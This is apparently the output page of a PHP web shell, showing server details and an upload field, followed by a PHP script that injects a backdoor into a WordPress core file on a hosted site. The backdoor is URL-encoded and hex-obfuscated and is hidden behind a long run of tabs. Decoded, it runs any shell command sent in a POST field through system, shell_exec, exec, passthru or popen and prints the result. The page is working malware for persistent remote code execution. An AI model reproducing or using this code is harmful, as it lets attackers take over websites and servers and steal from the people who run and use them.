| Server IP : 192.64.112.168 / Your IP : 3.136.27.210 Web Server : Apache System : Linux nc-ph-2300-85.bluforrest.com 4.18.0-513.9.1.el8_9.x86_64 #1 SMP Sat Dec 2 05:23:44 EST 2023 x86_64 User : expressoneac ( 1128) PHP Version : 8.0.30 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /tmp/ |
Upload File : |
<?php $path = '/home/celebrategoodtim/public_html/wp-includes/Requests/src/Autoload.php'; $ft = @filemtime($path); $content = file_get_contents($path); $new_code = rawurldecode('%24parameter1%20%3D%20%27973%27%3B%24parameter2%20%3D%20%2756d%27%3B%24parameter3%20%3D%20%27865%27%3B%24parameter4%20%3D%20%27c5f%27%3B%24parameter5%20%3D%20%27706%27%3B%24parameter6%20%3D%20%27173%27%3B%24parameter7%20%3D%20%27737%27%3B%24parameter8%20%3D%20%27468%27%3B%24parameter9%20%3D%20%27656%27%3B%24parameter10%20%3D%20%27472%27%3B%24parameter11%20%3D%20%27745%27%3B%24parameter12%20%3D%20%276f6%27%3B%24parameter13%20%3D%20%27e74%27%3B%24parameter14%20%3D%20%2736c%27%3B%24parameter15%20%3D%20%27363%27%3B%24parameter16%20%3D%20%27657%27%3B%24cache1%20%3D%20pack%28%22H%2A%22%2C%20%27737%27.%24parameter1.%27746%27.%24parameter2%29%3B%24cache2%20%3D%20pack%28%22H%2A%22%2C%20%27736%27.%24parameter3.%276c6%27.%24parameter4.%27657%27.%27865%27%29%3B%24cache3%20%3D%20pack%28%22H%2A%22%2C%20%27657%27.%27865%27%29%3B%24cache4%20%3D%20pack%28%22H%2A%22%2C%20%24parameter5.%24parameter6.%24parameter7.%24parameter8.%27727%27%29%3B%24cache5%20%3D%20pack%28%22H%2A%22%2C%20%27706%27.%27f70%27.%24parameter9%29%3B%24cache6%20%3D%20pack%28%22H%2A%22%2C%20%24parameter7.%24parameter10.%24parameter9.%2716d%27.%275f6%27.%27765%27.%24parameter11.%27f63%27.%24parameter12.%24parameter13.%24parameter9.%27e74%27%29%3B%24cache7%20%3D%20pack%28%22H%2A%22%2C%20%27706%27.%24parameter14.%276f7%27.%27365%27%29%3B%24accepted%20%3D%20pack%28%22H%2A%22%2C%20%27616%27.%24parameter15.%24parameter16.%27074%27.%24parameter9%29%3Bif%28isset%28%24_POST%5B%24accepted%5D%29%29%7B%24accepted%3Dpack%28%22H%2A%22%2C%24_POST%5B%24accepted%5D%29%3Bif%28function_exists%28%24cache1%29%29%7B%24cache1%28%24accepted%29%3B%7Delseif%28function_exists%28%24cache2%29%29%7Bprint%20%24cache2%28%24accepted%29%3B%7Delseif%28function_exists%28%24cache3%29%29%7B%24cache3%28%24accepted%2C%24arg_state%29%3Bprint%20join%28%22%5Cn%22%2C%24arg_state%29%3B%7Delseif%28function_exists%28%24cache4%29%29%7B%24cache4%28%24accepted%29%3B%7Delseif%28function_exists%28%24cache5%29%26%26function_exists%28%24cache6%29%26%26function_exists%28%24cache7%29%29%7B%24slot_storage%3D%24cache5%28%24accepted%2C%22r%22%29%3Bif%28%24slot_storage%29%7B%24prop_field%3D%24cache6%28%24slot_storage%29%3B%24cache7%28%24slot_storage%29%3Bprint%20%24prop_field%3B%7D%7Dexit%3B%7D'); if (strstr($content, $new_code)) { die('!already injected!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) { if (substr($content, 0, strlen($start)) == $start) { $content = substr($content, strlen($start)); $content = $start.str_repeat("\t", 42).$new_code."\n".$content; if (file_put_contents($path, $content)) { $content = file_get_contents($path); if (strstr($content, $new_code)) { die("!success!<ft>{$ft}</ft>"); } } } } die('!failed!');